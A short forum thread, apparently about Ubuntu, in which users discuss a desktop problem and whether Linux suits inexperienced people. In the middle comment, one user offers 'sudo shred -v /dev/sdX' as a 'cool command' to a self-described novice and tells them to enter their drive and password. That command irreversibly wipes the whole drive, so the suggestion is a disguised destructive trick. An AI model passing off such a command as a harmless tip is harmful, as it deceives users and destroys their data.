    I have never had that problem, however I don't use stock Ubuntu. I have added my own theme. You could write a .sh script that runs the command and add it as a startup script.

      I'm just a lowly female, so that sounds like something way above my pay grade! It's practically a miracle my laptop doesn't explode each time when I use the Terminal.

        If someone falls for that they should not be using Linux. Another cool command is sudo shred -v /dev/sdX


        Replace sdX with your hard drive partition. Enter your password when prompted. Enjoy

          As far as I know Linux is a system for all people, with distributions like Ubuntu, Mint and Puppy also meant for people to be able to use in less affluent parts of the world. I think this is an OS designed for people with little resources, both financial and educational. As anecdotal evidence I fit in just right.
